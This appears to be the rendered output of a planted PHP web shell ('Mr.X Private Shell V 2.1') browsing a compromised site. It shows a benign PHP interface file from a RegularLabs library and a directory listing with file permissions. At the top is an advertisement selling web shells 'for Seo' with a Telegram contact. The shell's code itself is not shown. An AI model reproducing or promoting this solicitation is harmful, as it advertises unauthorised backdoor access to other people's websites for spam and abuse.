__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace RegularLabs\Scoped\DeepCopy\Filter;
/**
* Filter to apply to a property while copying an object
*/
interface Filter
{
/**
* Applies the filter to the object.
*
* @param object $object
* @param string $property
* @param callable $objectCopier
*/
public function apply($object, $property, $objectCopier);
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| Doctrine | Folder | 0775 |
|
|
| ChainableFilter.php | File | 466 B | 0664 |
|
| Filter.php | File | 367 B | 0664 |
|
| KeepFilter.php | File | 282 B | 0664 |
|
| ReplaceFilter.php | File | 946 B | 0664 |
|
| SetNullFilter.php | File | 519 B | 0664 |
|